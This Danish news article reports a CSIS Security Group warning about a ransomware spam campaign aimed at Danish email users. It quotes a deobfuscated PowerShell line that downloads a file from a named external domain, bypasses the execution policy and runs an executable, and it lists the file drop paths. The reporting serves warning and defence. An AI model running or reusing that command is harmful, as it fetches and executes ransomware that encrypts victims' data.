Artikel top billede

Modtager du en mail, der ligner ovenstående billede, bør du slette beskeden med det samme. Skærmdump: CSIS Security Group.

Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

En spambølge målrettet danske mail-modtager skyller ind over landet med filer, der kan hente ransomware på modtagerens computer. Læs her, hvad du skal passe på.

Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.

Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.

Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.

Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript.

"Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.

Sådan forløber angrebet

I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.

Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:

C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jse
C:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe

"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.

Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.

Læs også:
Ransomware as a service boomer: Så nemt kan menigmand angribe dig med ransomware

Alvorlig afsløring: Halvdelen af alle ransomware-ofre ender med at betale løsepenge




Brancheguiden
Brancheguide logo
Opdateres dagligt:
Den største og
mest komplette
oversigt
over danske
it-virksomheder
Hvad kan de? Hvor store er de? Hvor bor de?
Hewlett-Packard ApS
Udvikling og salg af software, hardware, konsulentydelser, outsourcing samt service og support.

Nøgletal og mere info om virksomheden
Skal din virksomhed med i Guiden? Klik her

Kommende events
AI i det offentlige: Potentiale, erfaringer og krav

Hør erfaringerne med at anvende AI til at transformere og effektivisere processer i det offentlige – og med at sikre datakvalitet, governance og overholdelse af retningslinjer.

27. august 2025 | Læs mere


Computerworld Cloud & AI Festival 2025

Med den eksplosive udvikling indenfor cloud & AI er behovet for at følge med og vidensdeling større end nogensinde før. Glæd dig til to dage, hvor du kan netværke med over 2.400 it-professionelle, møde mere end 50 it-leverandører og høre indlæg fra +90 talere. Vi sætter fokus på emner som AI; infrastruktur, compliance, sikkerhed og løsninger for både private og offentlige organisationer.

17. september 2025 | Læs mere


IT og OT i harmoni: Sikring uden at gå på kompromis med effektiviteten

IT og OT smelter sammen – men med risiko for dyre fejl. Få metoder til sikker integration med ERP, kundesystemer og produktion. Tilmeld dig og få styr på forskellene og faldgruberne.

24. september 2025 | Læs mere